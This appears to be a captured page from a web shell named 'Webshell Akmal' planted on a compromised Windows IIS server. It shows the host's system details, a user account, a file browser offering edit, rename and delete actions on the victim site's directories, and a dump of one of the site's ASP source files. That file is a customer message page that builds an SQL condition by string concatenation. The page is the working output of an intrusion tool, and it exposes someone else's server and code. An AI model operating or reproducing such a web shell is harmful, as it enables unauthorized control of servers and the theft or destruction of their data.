Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <!--#include file="site_conn.asp" --><!--#include file="Cls_Page.asp"--> <title>FAQ</title> <% UserEmail=session("UserEmail") UserId=session("UserId") 'if len(UserEmail)=0 then 'response.End() 'end if %> <%call default_css_js()%> <link href="css/thickbox.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="js/jquery-1.4.4.min.js"></script> <script type="text/javascript" src="js/ThickBox/thickbox.js"></script> <style type="text/css"> <!-- .STYLE1 { font-size: 16px; font-weight: bold; color: #000000; font-family: Verdana, Arial, Helvetica, sans-serif; } .STYLE4 { font-size: 18px; color:#000000; font-weight: bold; } .STYLE5 { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 16px; } .STYLE7 {color: #000000} .STYLE8 {font-size: 16px; } .STYLE9 {color:#000000; font-size: 18px;} .STYLE11 {font-family: Verdana, Arial, Helvetica, sans-serif} --> </style> </head> <body> <div style="margin-top:10px; text-align:center" class="STYLE4"> My Message </div> <div id="cms_main" style="margin-top:10px"> <table width="100%" id="main_content" border="1" cellpadding="1" cellspacing="0"> <tr class="content_title" height="40"> <td width="115"><div align="center"><strong>Tracking</strong></div></td> <td width="530" style="text-align:center"><strong>Subject</strong></td> <td width="155"><div align="center"><strong>Date Created</strong></div></td> <td width="165"><div align="center"><strong>Last update </strong></div></td> <td width="132"><div align="center"><strong>Status</strong></div></td> </tr> <% Thispage ="http://" & Request.ServerVariables("SERVER_NAME")& Request.ServerVariables("URL") Dim SS(1000,6) UserEmail=session("UserEmail") Set Page = new Cls_Page '�������� Set Page.Conn = conn '�õ����ݿ����Ӷ��� With Page .PageSize = 5 'ÿҳ��¼���� .PageParm = "page" 'ҳ���� '.PageIndex = 10 '��ǰҳ����ѡ������һ�������ɾ�̬ʱ��Ҫ .Database = "ac" '���ݿ�����,ACΪaccess,MSSQLΪsqlserver2000�洢���̰�,MYSQLΪmysql,PGSQLΪPostGreSql .Pkey="id" '���� .Field="id,tracking,subject,content,creatdate,lastdate,status,userid,useremail" '�ֶ� .Table="Question" '���� .Condition="useremail='"&UserEmail&"'" '����,����Ҫwhere .OrderBy="lastdate desc" '����,����Ҫorder by,��Ҫasc����desc .RecordCount = 0 '�ܼ�¼���������ⲿ��ֵ��0�����棨�ʺ���������-1��Ϊsession��-2��Ϊcookies��-3��Ϊapplacation .NumericJump = 5 '��������ҳ��������ѡ������Ĭ��Ϊ3������Ϊ��ת������0Ϊ��ʾ���� .Template = "<div class=""page_list""><div class=""list_info"">{$FirstPage}{$PreviousPage}{$NumericPage}{$NextPage}{$LastPage}</div></div>" '����ģ�壬��ѡ��������Ĭ��ֵ .FirstPage = " << " '��ѡ��������Ĭ��ֵ '.FirstPage = "��ҳ" .PreviousPage = " < " '��ѡ��������Ĭ��ֵ '.PreviousPage = "��һҳ" .NextPage = " > " '��ѡ��������Ĭ��ֵ '.NextPage = "��һҳ" .LastPage = " >> " '��ѡ��������Ĭ��ֵ '.LastPage = "βҳ" .NumericPage = "{$PageNum}" '���ַ�ҳ����ģ�壬��ѡ��������Ĭ��ֵ End With rs = Page.ResultSet() '��¼�� 'rc = Page.RowCount() '��ѡ������ܼ�¼�� nav = Page.Nav() '��ҳ��ʽ If IsNull(rs) Then %> <tr> <td colspan="5" align="center" class="content_list">No Message</td> </tr> <% Else For i=0 To Ubound(rs,2) %> <tr> <td height="43"><%=rs(1,i)%></td> <td><a href="<%=Thispage%>?ID=MyAsc365Reply&questionid=<%=rs(0,i)%>" target="_blank"><font style="color:#e4007e"><%=rs(2,i)%></font></a></td> <td><%=rs(4,i)%></td> <td><%=rs(5,i)%></td> <% state1=cint(rs(6,i)) if state1=0 then %> <td> Need Reply </td> <% else %> <td> Replied </td> <% end if %> </tr> <% next end if %> </table> <%Response.Write nav%> </div> <div style="margin-top:20px"> <table width="100%" id="newtable" border="0" cellpadding="0" cellspacing="0"> <form id="form1" method="POST" action="?ID=MyAsc365&Action=AddQuestion"> <tr> <td colspan="2"> <span class="STYLE1">Creat a new question </span></td> </tr> <tr> <td width="9%"><div align="left"><font style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:16px;">Subject:</font></div></td> <td width="91%"><input type="text" id="subject" name="subject" size="70" /></td> </tr> <tr> <td colspan="2"><font style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:16px;">Specific Questions:</font></td> </tr> <tr> <td colspan="2"><textarea id="content" name="content" style="width:600px; height:200px;"></textarea></td> </tr> <tr> <td colspan="2"><input style="margin-left:30px" type="submit" name="B2" value="submit" /></td> </tr> </form> </table> <% rs.close set rs=nothing %> </div> </body> </html>